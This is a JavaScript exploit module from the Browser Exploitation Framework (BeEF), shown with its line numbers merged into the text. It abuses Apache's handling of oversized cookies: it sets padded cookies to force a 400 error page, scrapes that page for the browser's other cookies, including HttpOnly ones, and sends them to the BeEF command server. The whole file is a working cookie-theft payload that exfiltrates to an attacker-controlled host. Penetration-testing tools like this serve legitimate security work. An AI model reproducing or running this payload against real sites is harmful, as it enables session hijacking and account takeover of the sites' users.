Path: blob/master/modules/exploits/apache_cookie_disclosure/command.js
//1// Copyright (c) 2006-2025Wade Alcorn - [email protected]2// Browser Exploitation Framework (BeEF) - https://beefproject.com3// See the file 'doc/COPYING' for copying permission4//56// BASED ON https://gist.github.com/1955a1c28324d4724b7b/7fe51f2a66c1d4a40a736540b3ad3fde02b7fb0878beef.execute(function() {910function setCookies (good) {1112var str = "";1314for (var i=0; i< 819; i++) {15str += "z";16}1718for (i = 0; i < 10; i++) {1920if (good) { // Expire evil cookie21var cookie = "beef" + i + "=;expires=" + new Date(+new Date()-1).toUTCString() + "; path=/;";22} else { // Set evil cookie23var cookie = "beef" + i + "=" + str + "; path=/";24}25document.cookie = cookie;26}27}2829function makeRequest() {30setCookies();3132function parseCookies () {33var cookie_dict = {};3435// React on 400 status36if (xhr.readyState === 4 && xhr.status === 400) {3738// Replace newlines and match <pre> content39var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);4041if (content.length) {4243// Remove "Cookie:" prefix44content = content[1].replace("Cookie: ", "");4546var cookies = content.replace(/beef\d=z+;?/g, '').split(/;/g);4748// Add cookies to object49for (var i=0; i<cookies.length; i++) {50var s_c = cookies[i].split('=',2);51cookie_dict[s_c[0]] = s_c[1];52}53}5455// Unset malicious cookies56setCookies(true);5758var result = JSON.stringify(cookie_dict);5960beef.net.send("<%= @command_url %>", <%= @command_id %>, "cookies="+result);6162}63}6465// Make XHR request66var xhr = new XMLHttpRequest();67xhr.onreadystatechange = parseCookies;68xhr.open("GET", "/", true);69xhr.send(null);70}7172makeRequest();7374});7576